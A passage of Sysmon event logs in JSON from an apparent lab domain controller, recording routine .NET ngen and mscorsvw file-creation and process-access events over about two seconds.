{"EventTime":"2020-08-01 05:59:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7449,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:25.246\r\nProcessGuid: {A837DB8D-04BC-5F25-0000-0010224D1000}\r\nProcessId: 3088\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c10-0\\System.Data.Services.Design.dll\r\nCreationUtcTime: 2020-08-01 05:59:25.246","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:25.246","ProcessGuid":"{A837DB8D-04BC-5F25-0000-0010224D1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c10-0\\System.Data.Services.Design.dll","CreationUtcTime":"2020-08-01 05:59:25.246","EventReceivedTime":"2020-08-01 05:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7450,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:25.293\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001064C80D00}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:25.293","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001064C80D00}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7451,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:25.293\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001064C80D00}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:25.293","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001064C80D00}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7452,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:25.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001064C80D00}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:25.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001064C80D00}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7453,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:25.356\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-00107D320E00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:25.356","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-00107D320E00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7454,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:25.356\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-00107D320E00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:25.356","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-00107D320E00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7455,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:25.356\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048E-5F25-0000-00107D320E00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:25.356","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048E-5F25-0000-00107D320E00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7456,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:27.309\r\nProcessGuid: {A837DB8D-04BD-5F25-0000-0010E7541000}\r\nProcessId: 2984\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ba8-0\\System.Data.SqlXml.dll\r\nCreationUtcTime: 2020-08-01 05:59:27.309","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:27.309","ProcessGuid":"{A837DB8D-04BD-5F25-0000-0010E7541000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ba8-0\\System.Data.SqlXml.dll","CreationUtcTime":"2020-08-01 05:59:27.309","EventReceivedTime":"2020-08-01 05:59:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7457,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:27.371\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010CD760D00}\r\nTargetProcessId: 756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:27.371","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010CD760D00}","TargetProcessId":"756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\n